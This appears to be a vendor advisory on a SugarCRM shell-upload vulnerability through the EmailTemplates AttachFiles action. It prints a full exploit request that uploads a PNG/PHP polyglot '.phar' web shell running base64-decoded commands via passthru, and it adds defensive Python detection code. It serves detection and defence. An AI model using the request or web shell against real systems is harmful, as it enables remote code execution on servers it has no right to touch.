Application Details
SugarCRM is an open source customer relationship management suite.
Vulnerability
SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability caused by improper input validation. A remote, authenticated attacker can upload a file that the server will execute, allowing arbitrary code to run on the system.
Identification
By sending a specially crafted multipart request to the EmailTemplates module (action AttachFiles), an attacker could exploit this vulnerability to upload and execute arbitrary PHP code on the system. In the captured request below, the uploaded file has a .phar filename, is declared as image/png, and carries PHP code embedded inside otherwise valid PNG data:
POST /index.php HTTP/1.1
Host: 192.168.74.130:8080
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 577
Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="module"
EmailTemplates
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="action"
AttachFiles
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="file"; filename="sweet.phar"
Content-Type: image/png
.PNG
.
...
IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7... pHYs..........+.....*IDAT(.c`.
...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`.
--24dca17724a5bf7732b724ccdaa83abd--
Detection
By turning this request into a traffic file and a matching rule, we are able to detect attempts to exploit this vulnerability and execute arbitrary code on the system.
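As an added illustration of the kind of content-based check such a matching rule performs (example code written for this page, not Idappcom's signature 8023455 and not SugarCRM's code), the following Python parses a multipart upload and flags the traits visible in the request above: the EmailTemplates/AttachFiles route, a PHP-executable extension behind an image Content-Type, and a PHP open tag inside the file body. The boundary value is reused from the capture; the sample bodies are constructed, with a harmless PHP marker in place of the captured payload, and the extension lists are the example's own assumptions.

```python
import os
import re

EXEC_EXTENSIONS = {".php", ".phar", ".phtml", ".php5", ".php7"}  # PHP-executed; list assumed for this example
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
PARAM = re.compile(rb'(\w+)="([^"]*)"')
BOUNDARY = "24dca17724a5bf7732b724ccdaa83abd"  # boundary reused from the capture above

def parse_multipart(content_type: str, body: bytes) -> list[dict]:
    boundary = b"--" + content_type.split("boundary=", 1)[1].strip().encode()
    parts = []
    for chunk in body.split(boundary)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        # the CRLF after a boundary and the CRLF before the next one are framing, not data
        head, _, data = chunk.removeprefix(b"\r\n").removesuffix(b"\r\n").partition(b"\r\n\r\n")
        hdrs = {k.lower(): v.strip() for k, _, v in (l.partition(b":") for l in head.split(b"\r\n"))}
        params = dict(PARAM.findall(hdrs.get(b"content-disposition", b"")))
        parts.append({"name": params.get(b"name", b"").decode(), "data": data,
                      "filename": params.get(b"filename", b"").decode(),
                      "ctype": hdrs.get(b"content-type", b"").decode()})
    return parts

def upload_indicators(content_type: str, body: bytes) -> list[str]:
    """Reasons an EmailTemplates/AttachFiles upload looks like a PHP shell upload."""
    fields = {p["name"]: p for p in parse_multipart(content_type, body)}
    route = (fields.get("module", {}).get("data"), fields.get("action", {}).get("data"))
    f = fields.get("file")
    if route != (b"EmailTemplates", b"AttachFiles") or f is None:
        return []  # not the upload path this advisory describes
    ext = os.path.splitext(f["filename"])[1].lower()
    reasons = []
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    if f["ctype"].startswith("image/") and ext not in {".png", ".jpg", ".jpeg", ".gif"}:
        reasons.append("image/* Content-Type with a non-image extension")
    if PHP_TAG.search(f["data"]):  # PNG magic proves nothing: the capture above is a polyglot
        reasons.append("PHP open tag inside the file body")
    return reasons

def build_body(filename: str, ctype: str, data: bytes) -> bytes:
    sep = f"--{BOUNDARY}\r\n".encode()
    return (sep + b'Content-Disposition: form-data; name="module"\r\n\r\nEmailTemplates\r\n'
            + sep + b'Content-Disposition: form-data; name="action"\r\n\r\nAttachFiles\r\n'
            + sep + (f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
                     f"Content-Type: {ctype}\r\n\r\n").encode() + data + b"\r\n"
            + f"--{BOUNDARY}--\r\n".encode())

# constructed samples: a PNG/PHP polyglot shaped like the capture (harmless marker) and a clean PNG
SHELL_UPLOAD = build_body("sweet.phar", "image/png", b"\x89PNG\r\n\x1a\n<?php /* marker */ ?>")
CLEAN_UPLOAD = build_body("logo.png", "image/png", b"\x89PNG\r\n\x1a\nIHDR IEND")
```

Run `upload_indicators(f"multipart/form-data; boundary={BOUNDARY}", SHELL_UPLOAD)` to see the three indicators for the constructed polyglot upload, while the clean PNG upload yields none.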
Coverage
Idappcom has created signature 8023455 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional